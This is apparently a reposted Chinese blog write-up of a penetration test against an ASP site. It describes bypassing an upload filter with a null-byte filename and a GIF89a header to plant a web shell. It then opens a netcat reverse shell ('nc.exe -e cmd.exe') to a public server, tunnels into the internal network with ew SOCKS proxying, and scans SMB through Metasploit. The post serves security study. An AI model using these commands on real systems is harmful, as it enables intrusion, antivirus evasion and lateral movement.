【内网渗透】记录一次内网渗透

在公司进行渗透测试项目,网站是asp的网站,有个上传点,但是上传的后缀名只能是jpg,gif,png,通过00截断绕过,但是文件名不能有asp,因此通过构造形如

aaa.cer%00.jpg

进行绕过。
但是发现服务器端会对上传的内容进行危险代码检测,<%是不能存在于里面的,Fuzz了一波后发现如果上传的文件头是GIF89a的话,并且一句话木马不在最后位置就可以进行绕过。成功得到shell

【内网渗透】记录一次内网渗透_第1张图片

得到shell后发现权限比较低,是iis的


并没有想着提权,而是打算利用ew来把内网先带出来,然后进行内网的进一步扫描

通过tasklist命令,发现存在360杀毒软件,因此找了一个目录,将免杀的工具上传。

上传了一个nc.exe 打算获取一个交互式的shell(菜刀的shell不是交互式的,有的时候不好用)
现在我们的公网服务器上执行

nc -lvvp 4444

监听4444端口

然后,在“肉鸡”上执行

nc.exe -e cmd.exe [公网ip] 4444

发现在公网服务器上已经获取了交互式的shell

然后上传免杀的windows版本的ew
首先,在公网服务器上执行

./ew -s rcsocks -l 1080 -e 55

然后在“肉鸡”上执行

ew.exe -s rssocks -d [公网ip] -e 55

最后在我们的机器上,在proxychains.conf 添加

socks5 [公网ip] 1080

然后在我们机器上执行

proxychains msfconsole

就可以了,现在我们的msf就相当于在对方的内网当中了,扫一波smb


【内网渗透】记录一次内网渗透_第2张图片

你可能感兴趣的:(【内网渗透】记录一次内网渗透)